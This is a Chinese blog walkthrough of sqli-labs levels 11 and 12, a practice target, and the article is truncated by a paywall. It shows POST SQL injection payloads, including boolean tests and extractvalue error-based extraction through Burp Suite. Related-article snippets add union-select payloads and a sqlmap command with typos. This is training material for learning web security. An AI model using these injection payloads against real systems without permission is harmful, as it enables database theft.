2020.4.3 sqli-labs--第十一、十二关①

最新推荐文章于 2024-07-22 18:50:00 发布

藏蓝色的达达

最新推荐文章于 2024-07-22 18:50:00 发布

阅读量497

点赞数

分类专栏： web安全

本文链接：https://blog.csdn.net/DSR446/article/details/105301290

版权

本文介绍了在sqli-labs的第十一、十二关中，如何利用extractvalue和联合查询（union select）进行SQL注入攻击。首先，通过BP抓包并修改POST参数，尝试extractvalue方法进行报错型注入，逐步揭示数据库名、表名、字段名及字段值。其次，使用联合查询构造payload，以显示隐藏内容。最后，推荐使用sqlmap自动化工具，快速完成数据库信息的爆破。第十二关虽然闭合方式有所不同，但整体思路与第十一关相似。

摘要由CSDN通过智能技术生成

在这里插入图片描述 对于post传参的我们最好用bp

输入admin admin 登陆，抓包，发送到repeater模块
在这里插入图片描述在repeater中通过修改post的参数进行注入。

方法一 extractvalue测试payload

uname=admin' and 1=1 --+ &passwd=admin&submit=Submit //能登陆
uname=admin' and 1=2 --+ &passwd=admin&submit=Submit //不能登陆

在这里插入图片描述说明注入生效，存在报错型注入，接下来又是重复性工作，上extractvalue()

爆数据库名：

uname=admin' and extractvalue(1,concat(0x7e,(select database()))) --+&passwd=admin&submit=Submit

爆表名：

uname

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

藏蓝色的达达

关注关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

sqlmap过SQLi-LABS靶场 11-20关

小明师傅博客

06-05

3710

第11关后面基本都是post注入了不过我们用的是神器sqlmap 我们先随便输入,然后bp抓包把抓到的包保存问txt格式然后在sqlmap 指定他用 -r sqlmap.py -r "C:\Users\Administrator\Desktop\post.txt" --leve=5 --sisk=3 --dbs 全部就扫出来啦第12关一模一样第13关多了两条，要用空值测试，线程默认10跑这个速度好慢然后也是一模一样 14关一模一样 15关一模一样 16关-20关都

sqli-labs第十一和十二关(post请求爆库)

qq_42266432的博客

08-23

608

第十一关开始，有输入框了，先往里面分别填入两个1看看页面回显了"尝试登录失败"并且在上面url中并未发现路径后面有提交的参数，说明这不是get请求了，打开hackbar，loadURL发现是以表单方式提交的post请求（刚开始准备使用burp抓包来看请求，结果burp抓取不到本地包就很迷）到这里就可以尝试开始注入了如上图，uname加上单引号，想要的东西就回显出来了在将uname变为1’ or 1,上图这个sql报错可以猜出sql的条件目前是uname=‘1’ or 1’ and passwor

参与评论您还未登录，请先登录后发表或查看评论

sqli-labs通关攻略（全关卡）（更新中~）

最新发布

C233333235的博客

07-22

603

7.然后就要进行表名的查询，此处在2的位置用group_concat(table_name),3 from information_schema.tables where table_schema='security'语句进行查询，group_concat的作用是将查询出的表名显示到一行，不然只能显示第一个表名。（别忘了在参数1前面加-，主要是为了使参数变为一个不存在的参数，任何过大的数字或负数，以及小数，科学计数法数字都可以），在这里确定其回显位置为2和3。1.打开关卡，提示我们将参数id填入url中。

sqli-labs第十二关

yuqnqi的博客

05-08

799

对了，也可以用报错注入，下次再写。由此判断为，双引号反括号闭合；post传值，跟十一关差不多。就是正常的sql注入流程。第一步，判断闭合方式。

sqli-labs第12关

weixin_45626840的博客

04-23

339

思路一样闭合类型为 “）

sqli-labs靶场第十二关

gou1791241251的博客

12-27

759

第十二关与第十一关差在了单引号和双引号， admin") or (select table_name from information_schema.tables where table_schema=database())=‘emails’ # 执行同样的操作即可查询出数据库的信息啦。

sqli-labs第十一关、第十二关

qq_51366383的博客

12-07

436

从第十一关开始需要使用bp，我这里的都是用的repeater操作的。判断闭合符 uname=admin’ --+&passwd=admin&submit=Submit 通过下面的对比可以看到这个是有回显出来的 uname=admin" --+&passwd=admin&submit=Submit 判断列数 uname=admin’ order by 2 --+&passwd=admin&submit=Submit 判断回显位 uname=admin’

2020.4.4 sqli-labs--第十五、十六关 ②

DSR446的博客

04-04

446

less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注) 方法一盲注 - 基于布尔值 - 字符串怎么输入都没有回显，那就时间延迟吧。布尔测试payload uname=admin' and 1=1 --+&passwd=admin&submit=Submit //登...

2020.4.4 sqli-labs--第十三、十四关③

DSR446的博客

04-04

360

Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入) 方法一通过报错可知是通过’) 闭合的发现没有登入成功返回信息，看来是要盲注了万能密码: 账号admin’)# 密码：随便方法二：既然它返回错误信息了，说明有回显，可以报错注入。数据库名 uname=admin') and e...

2020.4.3 sqli-labs--第八、九、十关②

DSR446的博客

04-04

497

方法一：看是否有file权限，利用into outfile 1.?id=2’ --+ 页面回显正常，不赘述了，这里是单引号字符型注入 2.页面没有显示位，没有数据库报错信息。我们先尝试一下是否有file权限（先判断字段数） 3.当输入3时返回正常，输入4时不返回。 http://127.0.0.1/sqli-labs/Less-8/?id=1' union select 1,"<?php...

2020-10-23-sqli-labs.md

01-24

本例中回显位置为第2和第3个字段。 - **查询数据库信息**： - **数据库名称**：`id=-1' union select 1,database(),3 --+` - **表名**：`id=-1' union select 1,(select group_concat(table_name) from ...

Sqlilabs-12

KAKA的博客

07-07

309

这里到了 12 关，是 11 关的练习版本，只不过是把单引号换成了双引号 + 括号，其余的都是一样的。这里仍然以 hackbar 为例构造 payload： uname=admin") order by 3#&passwd=1&submit=submit uname=admin") order by 2#&passwd=1&submit=submit uname=-admin") union select 1,2#&passwd=1&submit=sub.

sqli-labs关卡12(基于post提交的双引号闭合的字符型注入)通关思路

zyh1588的博客

11-10

691

小白回顾sql注入靶场第12关

Sqli-labs靶场第12关详解[Sqli-labs-less-12]

m0_73615178的博客

03-02

710

所以，payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句，然后为了使where语句条件成立，加上一个or 1=1 ，-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求，所以先使用burp进行抓包，然后将数据包存入txt文件中打包用-r 选择目标txt文件。根据题目看，像一个登录页面，尝试使用布尔型盲注测试能否登录网站。输入：-admin") union select 1,2--爆出当前数据库名称及当前用户名。

sqli-labs-master第十一、十二关

m_ing

05-12

1404

前言:我们前十关研究的是get方式注入，我们这里要明确一个概念，GET和POST的数据交流方式：GET是从服务器上获取数据，POST是向服务器传送数据。从第十一关开始就是POST方式交互数据，也就是向服务器传送数据先查看第十一关页面： http://192.168.89.134/sqli-labs-master/Less-11/ 访问我们的十一关，是一个登陆页面，通常post传送不能在url上看到数据，只能通过抓包工具进行查看等等我们先尝试一下输入一个’看看怎么反应我们那错误分析一波这样一来就非

sqli-labs靶场11-12关（基于POST联合查询）

qq_46527080的博客

12-12

621

1:GET 2:POST 3:Head 4:Put 5:Delete 6:Connect 7:Options 8:Trace 那么这里是典型的POST注入，那么注入点就是在POST数据中，而POST请求往往代表着用户向服务器提交了大量的数据请求，行为有包括文件上传，表单提交，按钮时间，这里分析是用户的登陆动作，那么肯定要对输入的用户名和密码带入数据库进行查询，接下来我们就把提交的用户名和密码直接替换成我们的测试语句； 1：这里我们可以使用burpsuite和hackbar都可以完成测试，这里我们选择使用Bu

sqli-labs靶场1-12关通关记录

SEV__en的博客

07-25

1734

攻击者通过注入SQL语句片段导致后端执行预期外的SQL查询。

SQLi-Labs靶场安装教程：PHPStudy与MySQL配置

sqli-labs是一个非常实用的在线安全训练平台，适合初学者熟悉SQL注入漏洞的各种类型和利用方法。首先，我们需要安装PHP环境，这里推荐使用PHPStudy，它集成了Apache服务器和MySQL数据库，方便快捷。你可以从官方...